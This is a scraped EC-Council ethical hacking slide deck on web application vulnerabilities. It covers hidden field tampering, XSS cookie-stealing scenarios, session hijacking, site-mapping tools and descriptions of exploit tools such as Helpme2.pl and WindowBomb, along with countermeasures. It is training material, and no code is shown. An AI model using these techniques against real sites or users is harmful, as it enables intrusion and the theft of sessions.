Embed Size (px)
Citation preview
Ethical Hacking
Module XII
Web Application Vulnerabilities
EC-Council
Module Objective
Understanding Web Application Security Common Web Application Security
Vulnerabilities Web Application Penetration
Methodologies Input Manipulation Authentication And Session Management Tools: Lynx, Teleport Pro, Black Widow,
Web Sleuth Countermeasures
EC-Council
Understanding Web Application Security
Firewall
Firewall
Database
Web App Scripts
Web Server
User
EC-Council
Reliability of Client-Side Data
Special Characters that have not been escaped
HTML Output Character Filtering
Root accessibility of web applications
ActiveX/JavaScript Authentication
Lack of User Authentication before performing
critical tasks.
Common Web Application Vulnerabilities
EC-Council
Web Application Penetration Methodologies
Information Gathering and Discovery
• Documenting Application / Site Map
• Identifiable Characteristics / Fingerprinting
• Signature Error and Response Codes
• File / Application Enumeration
– Forced Browsing
– Hidden Files
– Vulnerable CGIs
– Sample Files
Input/Output Client-Side Data Manipulation
EC-Council
Hacking Tool: Instant Source
http://www.blazingtool.com
Instant Source lets you take a look at a web page's source code, to see how things are done. Also, you can edit HTML directly inside Internet Explorer!
The program integrates into Internet Explorer and opens a new toolbar window which instantly displays the source code for whatever part of the page you select in the browser window.
EC-Council
Hacking Tool: Lynx
http://lynx.browser.org
Lynx is a text-based browser used for downloading source files and directory links.
EC-Council
Hacking Tool: Wget
www.gnu.org/software/wget/wget.html Wget is a command line tool for Windows and
Unix that will download the contents of a web site. It works non-interactively, so it will work in the
background, after having logged off. Wget works particularly well with slow or
unstable connections by continuing to retrieve a document until the document is fully downloaded.
Both http and ftp retrievals can be time stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.
EC-Council
Hacking Tool: Black Widow
http://softbytelabs .com
Black widow is a website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program.
Use it to scan a site and create a complete profile of the site's structure, files, E-mail addresses, external links and even link errors.
EC-Council
Hacking Tool: WebSleuth
http://sandsprite.com/sleuth/ WebSleuth is an excellent tool that combines spidering
with the capability of a personal proxy such as Achilles.
EC-Council
Hidden Field Manipulation
Hidden fields are embedded within HTML forms to maintain values that will be sent back to the server.
Hidden fields serve as a mean for the web application to pass information between different applications.
Using this method, an application may pass the data without saving it to a common backend system (typically a database.)
A major assumption about the hidden fields is that since they are non visible (i.e. hidden) they will not be viewed or changed by the client.
Web attacks challenge this assumption by examining the HTML code of the page and changing the request (usually a POST request) going to the server.
By changing the value the entire logic between the different application parts, the application is damaged and manipulated to the new value.
EC-Council
Input Manipulation
URL Manipulation -CGI Parameter
Tampering
HTTP Client-Header Injection
Filter/Intrusion Detection Evasion
Protocol/Method Manipulation
Overflows
EC-Council
What is Cross Side Scripting (XSS)?
A Web application vulnerable to XSS allows a user to inadvertently send malicious data to self through that application.
Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them.
These links cause client side scripting languages )VBScript, JavaScript etc,) of the attacker's choice to execute on the victim's browser.
XSS vulnerabilities are caused by a failure in the web application to properly validate user input.
EC-Council
Authentication And Session Management
Brute/Reverse Force
Session Hijacking
Session Replay
Session Forgoing
Page Sequencing
EC-Council
Traditional XSS Web Application Hijack Scenario - Cookie stealing
User is logged on to a web application and the session is currently active. An attacker knows of a XSS hole that affects that application.The user receives a malicious XSS link via an e-mail or comes across it on a web page. In some cases an attacker can even insert it into web content (e.g. guest book, banner, etc,) and make it load automatically without requiring user intervention.
EC-Council
XSS Countermeasures
As a web application user, there are a few ways to protect yourselves from XSS attacks.
The first and the most effective solution is to disable all scripting language support in your browser and email reader.
If this is not a feasible option for business reasons, another recommendation is to use reasonable caution while clicking links in anonymous e-mails and dubious web pages.
Proxy servers can help filter out malicious scripting in HTML.
EC-Council
Buffer Overflow in WINHLP32.EXE
A buffer-overrun vulnerability in WINHLP32.EXE
could result in the execution of arbitrary code on
the vulnerable system.
This vulnerability stems from a flaw in the Item
parameter within WinHLP Command.
This exploit would execute in the security context
of the currently logged on user.
Microsoft has released Windows 2000 Service
Pack 3 (SP3), which includes a fix for this
vulnerability.
EC-Council
Hacking Tool: Helpme2.pl
Helpme2.pl is an exploit code for
WinHelp32.exe Remote Buffer Overrun
vulnerability.
This tool generates an HTML file with a given
hidden command.
When this HTML file is sent to a victim through
e mail, it infects the victim's computer and
executes the hidden code.
EC-Council
Hacking Tool: WindowBomb
An email sent with this html file attached will create pop-up
windows until the PC's memory gets exhausted.
JavaScript is vulnerable to simple coding such as this.
EC-Council
Hacking Tool: IEEN
http://www.securityfriday.com/ToolDownload/IEenIEEN remotely controls Internet Explorer using DCOM.If you knew the account name and the password of a remote machine, you can remotely control the software component on it using DCOM. For example Internet Explorer is one of the soft wares that can be controlled.
EC-Council
Summary
Attacking web applications is the easiest way to compromise hosts, networks and users.
Generally nobody notices web application penetration, until serious damage has been done.
Web application vulnerability can be eliminated to a great extent ensuring proper design specifications and coding practices as well as implementing common security procedures.
Various tools help the attacker to view the source codes and scan for security holes.
The first rule in web application development from a security standpoint is not to rely on the client side data for critical processes. Using an encrypted session such as SSL / “secure” cookies are advocated instead of using hidden fields, which are easily manipulated by attackers.
A cross-site scripting vulnerability is caused by the failure of a web based application to validate user supplied input before returning it to the client system.
If the application accepts only expected input, then the XSS can be significantly reduced.
